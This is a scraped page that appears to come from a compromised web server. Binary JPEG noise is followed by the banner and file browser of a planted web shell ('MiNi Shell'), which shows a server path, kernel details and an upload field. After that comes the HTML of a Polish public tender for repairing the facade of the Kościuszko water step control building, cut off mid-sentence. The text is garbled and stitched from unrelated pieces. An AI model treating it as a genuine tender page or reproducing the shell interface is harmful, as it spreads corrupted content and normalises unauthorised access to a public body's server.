JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241011/0054315901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont elewacji starej sterowni stopnia Kościuszko </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krakow@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/wody-polskie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawne </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie Regionalny Zarząd Gospodarki Wodnej w Krakowie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">NIP: 5272825616</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Marszałka Józefa Piłsudskiego 22</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">31-109</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">monika.kondracka@wody.gov.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://przetargi.wody.gov.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont elewacji starej sterowni stopnia Kościuszko </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-524e1f75-036d-4233-87a6-b4331194231d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00543159</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl/wp/auctions/r21011,Remont-elewacji-starej-sterowni-stopnia-Kosciuszko.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy Pzp, z zastrzeżeniem wyjątków, o których mowa w<br/>niniejszej specyfikacji warunków zamówienia – zwanej dalej „SWZ” – komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem:<br/>https://przetargi.wody.gov.pl/.<br/>2. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem przetargi.wody.gov.pl w<br/>zakładce: Instrukcja dla Wykonawców. 3. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie. 4. Dokumenty<br/>związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5. Celem skomunikowania się z<br/>Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, których sposób<br/>złożenia został opisany w pkt 14 Specyfikacji Warunków Zamówienia, zwanej dalej „SWZ”), Wykonawca korzysta z zakładki<br/>„Zapytaj” (na etapie składania ofert) lub „Wiadomości” (po otwarciu ofert). Zakładki te służą również Zamawiającemu do komunikacji<br/>z Wykonawcami. 6. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub<br/>oświadczeń składanych razem z ofertą, uważa się datę wczytania korespondencji na Platformie. 7. Rozszerzenia plików<br/>wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do Rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych”, niemniej jednak Zamawiający rekomenduje<br/>sporządzenie korespondencji w następujących formatach: .doc., .docx, .rtf, .pdf, .xls. 8. Zamawiający informuje, że adres e-mail:<br/>monika.kondracka@wody.gov.pl wskazany w ogłoszeniu o zamówieniu, służy jedynie do przesyłania ogłoszeń i otrzymywania<br/>informacji zwrotnej z Biuletynu Zamówień Publicznych oraz zwrotu wadiów wniesionych w<br/>formie niepieniężnej. Ewentualne wykorzystanie poczty elektronicznej w innych celach, niż wskazane w zdaniu 1, może nastąpić<br/>jedynie w przypadku awarii Platformy, przy czym bez względu na przyczynę poczta elektroniczna nie może służyć do złożenia oferty.<br/>Nie jest to adres do komunikacji z Wykonawcami. 9. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi<br/>150 MB. 10. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez<br/>Wykonawcę za pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>cyfrowych odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy. 11. Zamawiający informuje, iż w przypadku<br/>jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą<br/>rozwiązania teleinformatycznego Platforma tel. +48 22 498 87 00 (infolinia dostępna w dni robocze, w godzinach 9:00-17:00) e-mail:<br/>pomoc@jskinternet.pl.<br/>12. Osobą uprawnioną do kontaktu z Wykonawcami jest Monika Kondracka. Kontakt odbywa się za pośrednictwem Platformy. 13.<br/>Postępowanie o udzielenie zamówienia jest prowadzone w języku polskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: a) administratorem Pani/Pana danych osobowych jest Państwowe<br/>Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP:<br/>527-282-56-16; b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail: iod@wody.gov.pl; c)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego oznaczonego numerem postępowania<br/>K.ROZ.2710.107.2024 prowadzonym na podstawie przepisów ustawy z dnia 11 września 2019r. Prawo zamówień publicznych; d)<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r. Prawo zamówień publicznych; e) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, przez okres 4 lat licząc od<br/>końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy; f) obowiązek podania przez Panią/Pana danych osobowych<br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach<br/>ustawy z dnia 11 września 2019r. Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019r. Prawo zamówień<br/>publicznych; g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO h) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; 2. Na podstawie art. 16 RODO prawo<br/>do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z przepisami ustawy z dnia 11 września 2019r. Prawo zamówień publicznych oraz nie może naruszać integralności<br/>protokołu oraz jego załączników); 3. Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie<br/>ma zastosowania w odniesieniu do<br/>przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego); 4. Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uznają Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO<br/>5. Nie przysługuje Państwu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; - prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; - na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">K.ROZ.2710.125.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem zamówienia jest wykonanie remontu elewacji budynku (stara sterownia śluzy) przy głowie dolnej śluzy<br/>Stopnia Wodnego Kościuszko w celu doprowadzenia elewacji do właściwego stanu technicznego.<br/>Stopień Wodny Kościuszko zlokalizowany jest w km 66 + 400 rzeki Wisły w m. Kryspinów gmina Liszki. Obiekt został<br/>oddany do eksploatacji w 1990 r. Stara sterownia śluzy zlokalizowana jest na głowie dolnej śluzy, strona lewa. Na skutek<br/>długoletniej eksploatacji obiektu w trudnych warunkach atmosferycznych i eksploatacyjnych (bezpośrednie sąsiedztwo<br/>mostu autostradowego) nastąpiła znaczna degradacji betonowej powierzchni elewacji budynku polegająca na korozji<br/>elementów stalowych zbrojenia ścian elewacyjnych i związanych z tym odspojeń wierzchniej warstwy betonowej ścian, rys,<br/>pęknięć, wybrzuszeń oraz odpadania betonu elewacyjnego różnej wielkości zagrażającego bezpieczeństwu pracowników i<br/>innych osób poruszających się w tym rejonie SW Kościuszko. Celem zapobieżenia dalszej degradacji elewacji budynku i<br/>doprowadzenia go do właściwego stanu technicznego zgodnego z wymogami Prawa Budowlanego i przepisami BHP<br/>konieczne jest wykonanie robót remontowych które to roboty są przedmiotem zamówienia.<br/>4.2 Zakres przedmiotu zamówienia będzie polegał na wykonaniu następujących robót:<br/>1. Oczyszczenie wszystkich odkrytych powierzchni betonowych elewacji przeznaczonych do remontu w szacunkowej ilości<br/>ok. 450 m2 z wykorzystaniem metody hydromonitoringu (ciśnienie robocze 500 bar).<br/>2. Skucie otuliny betonowej w miejscach odspojeń i odparzeń betonu (około 20%<br/>całej powierzchni tj. ok. 90 m2 na głębokość średnią 5 cm). 3. Oczyszczenie wszystkich odkrytych prętów zbrojeniowych do stopnia czystości St 2 –<br/>przygotowanie do wykonania zabezpieczenia antykorozyjnego.<br/>4. Zabezpieczenie antykorozyjne oczyszczonych prętów systemową zaprawą PCC<br/>5. Odtworzenie otuliny betonowej prętów zbrojeniowych wraz z wypełnieniem ubytków na<br/>elewacji za pomocą systemowych zapraw naprawczych PCC.<br/>6. Powierzchniowe doszczelnienie rys i szwów roboczych elastycznym środkiem uszczelniającym wodoodpornym na bazie<br/>żywic epoksydowych lub poliuretanowych po uprzednim rozkuciu na głębokość do 3 cm i długości 31 m.<br/>7. Zabezpieczenie antykorozyjne całej powierzchni betonowej elewacji elastyczną farbą<br/>dostosowaną do użytego systemu naprawczego PCC na pow. ok. 450 m2 . Kolorystyka wg<br/>RAL 7035 (jasnoszary).<br/>8. Demontaż i wymiana skorodowanych blach stalowych przykrywających kanał kablowy na<br/>zachodniej stronie elewacji na blachy aluminiowe gr. 3 mm w ilości ok. 28 m2 .<br/>9. Zabezpieczenie antykorozyjne drobnych elementów stalowych zainstalowanych na elewacji budynku starej sterowni<br/>zestawem systemowych farb malarskich na konstrukcje stalowe po uprzednim przygotowaniu powierzchni wg zaleceń<br/>producenta farb.<br/>Uwaga:<br/>1. Do zabezpieczenia antykorozyjnego prętów zbrojeniowych, odtworzenia ich otuliny i wypełnienia ubytków na elewacji<br/>należy zastosować jeden z dostępnych na rynku produktów systemowych typu PCC (zaprawy i betony polimerowocementowe<br/>do napraw powierzchniowych konstrukcji żelbetowych).<br/>2. Całkowity koszt wykonania robót winien uwzględniać:<br/>Wdrożenie, utrzymanie i demontaż tymczasowej organizacji ruchu na czas wykonywania robót na odcinku obwodnicy<br/>autostradowej przebiegającej przez Stopień Wodny Kościuszko.<br/>Montaż, dzierżawę i demontaż systemowych rusztowań lub alternatywne zastosowanie podnośników koszowych.<br/>Zabezpieczenie otworów okiennych na czas prowadzenia prac remontowych na elewacji.<br/>4.3 Warunki prowadzenia robót:<br/>1. Roboty będą prowadzone na czynnym obiekcie. W trakcie wykonywania prac należy zapewnić obsłudze Stopnia<br/>Wodnego Kościuszko dostęp do wnętrza pomieszczeń starej sterowni śluzy i innych pomieszczeń i urządzeń celem<br/>umożliwienia wykonywania czynności związanych z funkcjonowaniem stopnia.<br/>2. Zdemontowane i podlegające wymianie elementy stalowe, gruz budowlany oraz inne odpady wytworzonych w trakcie<br/>remontu należy usunąć poza teren obiektu. Czynności te leżą po stronie Wykonawcy.<br/>3. Istnieje możliwość korzystania z energii elektrycznej na czas wykonywania robót po uprzednim zamontowaniu sublicznika<br/>który będzie podstawą do rozliczenia zużytej energii elektrycznej po zakończeniu prac.<br/>4. Dla celów sanitarnych Wykonawca musi zapewnić toaletę przenośną i umieścić ją w miejscu wskazanym przez<br/>Kierownika SW Kościuszko.<br/>5. Możliwe miejsca rozlokowania zaplecza budowy zostaną wskazane Wykonawcy robót przez Kierownika SW Kościuszko.<br/>6. Informujemy, że teren prac jest terenem zalewanym w trakcie wezbrań powodziowych i w przypadku wystąpienia takiego<br/>wezbrania Wykonawca musi usunąć wszelkie materiały i sprzęt z tego terenu w bezpieczne miejsce.<br/>4.4 Szczegółowy zakres i rodzaj prac a także wymogi jego realizacji określa dokumentacja postępowania w tym w<br/>szczególności Opis przedmiotu zamówienia stanowiący Załącznik<br/>nr 2 do SWZ, kosztorys ofertowy stanowiący Załącznik nr 3 do SWZ, wzór umowy stanowiący Załącznik nr 4 do SWZ,<br/>przedmiary robót stanowiące Załącznik nr 14 do SWZ. Przedmiot zamówienia należy wykonać na warunkach określonych w<br/>SWZ oraz zgodnie ze wzorem umowy oraz obowiązującymi przepisami BHP.<br/>4.5 Zamawiający wymaga udzielenia rękojmi na wykonane roboty budowlane na okres 60 miesięcy liczonych od dnia<br/>zakończenia realizacji przedmiotu umowy potwierdzonego odbiorem końcowym.<br/>4.6 Kod CPV:<br/>45000000 – 7 – roboty budowlane;<br/>45453000 – 7 – roboty remontowe i renowacyjne;<br/>4.7 Zamawiający nie dopuszcza składania ofert częściowych.<br/>4.8 Uzasadnienie dla braku podziału zamówienia na części:<br/>Zamawiający nie dokonał podziału zamówienia na części ze względu na specyfikę robót, które muszą zostać wykonane w<br/>ciągłości i kompleksowo. Biorąc pod uwagę aspekty techniczne, organizacyjne, ekonomiczne wszystkie roboty powinny być<br/>wykonane przez jednego Wykonawcę. Dokonano analizy zamówienia pod kątem kosztów oraz zapewnienia<br/>konkurencyjności przetargu.<br/>Z dokonanego przeglądu dokumentacji jednoznacznie wynika, że udzielenie zamówienia jako całość jest zasadne i pozwoli<br/>m. in. na: podniesienie konkurencyjności oferty i zainteresowania ze strony przyszłych Wykonawców, przez co zwiększy się<br/>szansa na rozstrzygnięcie przetargu<br/>i uzyskanie lepszych warunków finansowych. Ponadto wyodrębnianie mniejszych jednostek zadaniowych groziłoby<br/>szeregiem nieprawidłowości, powodowałoby znaczące utrudnienia<br/>w koordynacji prac poszczególnych Wykonawców, a także rodziłoby ryzyko wzrostu całościowego kosztu realizacji<br/>zamówienia. Ponadto podział zamówienia na części rodziłby poważne utrudnienia z wyegzekwowaniem uprawnień<br/>Zamawiającego z tytułu rękojmi ze względu na fakt, że w takim przypadku odpowiedzialność za ostateczny rezultat robót<br/>rozłożyłby się pomiędzy kilku Wykonawców. W przypadku powierzenia zamówienia jednemu Wykonawcy, to on będzie<br/>odpowiadał za jakość i trwałość robót.<br/>4.9 Wizja lokalna:<br/>a) Wizja lokalna jest fakultatywna, jej odbycie nie jest warunkiem złożenia oferty;<br/>b) Zamawiający dopuszcza możliwość odbycia przez Wykonawcę wizji lokalnej – w terminie uzgodnionym z<br/>przedstawicielem Zamawiającego;<br/>c) Termin wizji Wykonawca winien uzgodnić z – Panem Michałem Klich Kierownikiem SW Kościuszko pod numerem<br/>telefonu +48 693 277 274.<br/>adres: Stopień Wodny Kościuszko na rzece Wiśle w Krakowie.<br/>d) Zamawiający nie zwraca kosztów udziału w wizji lokalnej, w tym w szczególności dojazdu na miejsce realizacji<br/>planowanych prac. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>2. Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>1) Cena brutto – waga kryterium 100%;<br/>Każdy 1% wagi równy jest 1 pkt oceny oferty.<br/>2.1 W kryterium „Cena” (C) Zamawiający przyzna wartości punktowe według następującego wzoru:<br/>C = (Cn : Cb) x 100<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty 